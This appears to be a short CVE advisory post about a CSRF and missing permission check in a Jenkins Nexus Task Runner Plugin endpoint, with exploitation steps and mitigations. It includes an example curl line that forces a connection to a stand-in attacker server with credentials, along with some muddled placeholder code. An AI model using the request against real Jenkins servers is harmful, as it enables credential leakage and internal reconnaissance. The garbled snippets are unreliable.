Jenkins Nexus Task Runner Plugin Cross-Site Request Forgery CVE-2025-XXXX (Moderate)

Listen to this Post

The CVE-2025-XXXX vulnerability exists within the Jenkins Nexus Task Runner Plugin, specifically in an HTTP endpoint that lacks necessary security controls. This endpoint fails to perform any permission checks, allowing attackers to exploit it. Users with Overall/Read permission in Jenkins, a typically low-privilege role, can be targeted. The flaw permits these authenticated users to force the plugin to send HTTP requests to an attacker-controlled server. The attacker can specify the target URL, along with the credentials (username and password) to be used for authentication on that remote system. Crucially, this endpoint is also accessible via GET requests, making it susceptible to Cross-Site Request Forgery (CSRF). This means an attacker could trick a logged-in Jenkins user with the required permission into visiting a malicious webpage, which would then automatically trigger a forged request from the victim’s browser to the vulnerable Jenkins endpoint, initiating the connection to the attacker’s server without the victim’s knowledge.
Platform: Jenkins Plugin
Version: <= 0.9.2
Vulnerability : CSRF
Severity: Moderate
date: 2025-10-29

Prediction: 2025-11-19

What Undercode Say:

`curl -X GET ‘http://jenkins-host/jenkins/descriptorByName/…/formFill?url=http://attacker-server&username=attacker&password=cred’`
``

`if (user.hasPermission(Jenkins.READ)) { // Missing check }`

How Exploit:

Attacker crafts malicious link or webpage embedding a request to the vulnerable plugin endpoint. An authenticated Jenkins user with Overall/Read permission is tricked into clicking the link or loading the page. Their browser automatically sends the request, triggering the plugin to connect to an attacker-specified URL with supplied credentials, potentially exposing internal systems or enabling further reconnaissance.

Protection from this CVE:

Upgrade plugin when patch is released. Until then, restrict Overall/Read permissions. Implement CSRF tokens. Use firewall rules to restrict outbound connections from Jenkins. Consider disabling the plugin if unused.

Impact:

Allows low-privileged users or attackers via CSRF to make unauthorized external HTTP connections from the Jenkins server, potentially leaking Jenkins credentials (if supplied to the endpoint) or being used as a proxy for internal network scanning.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top